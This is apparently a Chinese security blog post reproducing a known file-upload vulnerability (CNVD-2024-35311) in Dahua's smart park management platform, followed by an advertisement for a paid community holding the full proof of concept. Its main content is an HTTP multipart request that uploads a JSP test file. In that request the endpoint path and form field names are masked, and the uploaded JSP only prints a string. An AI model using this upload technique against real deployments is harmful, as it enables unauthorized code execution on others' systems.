【1day】⼤华智慧园区综合管理平台⽂件上传(CNVD2024-35311)

原创 跟着斯叔唠安全 跟着斯叔唠安全 2025-05-13 11:34

免责声明
：
请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1

Start

系统介绍

大华智慧园区综合管理平台
旨在通过构建统一的管理和服务平台，整合园区内的人、车、物、事件等多维度数据，实现园区的智能化、精细化管理。该平台主要面向商业园区、产业园区、高校园区等多种场景，提供从安防监控、设备管理到人员管理、访客管理、车辆管理等多方面的综合解决方案

资产测绘

2

Action

漏洞复现

直接使用payload，向目标接口上传文件

POST /******/******.****** HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 336

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="****"; filename="aaa.jsp"
Content-Type: text/plain

<% out.print("xxxx~~~");%>
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="***"

aaa.jsp
------WebKitFormBoundary7MA4YWxkTrZu0gW--

然后根据代码设定的上传文件名规则拼接成对应的文件名称，访问文件上传后文件存放的路径

3

End

🚀 新圈子上线 | 高质量安全内容持续更新中！

我最近在纷传上建立了一个全新的安全技术圈子，主要聚焦于 WEB安全、APP安全、代码审计、漏洞分享
 等核心方向。目前圈子刚刚建立，内容还不算多，但会持续高频更新
，只分享真正有价值、有深度的干货文章。

📚 圈子中包含：
– 高质量原创或精选的安全技术文章

• 公众号历史付费内容免费查看（如：小程序RPC、APP抓包解决方案）

• 一些只在圈子内分享的独家思路和实战经验

文章中涉及的完整POC及代码审计报告已上传至纷传圈子中，需要的师傅可以自取哈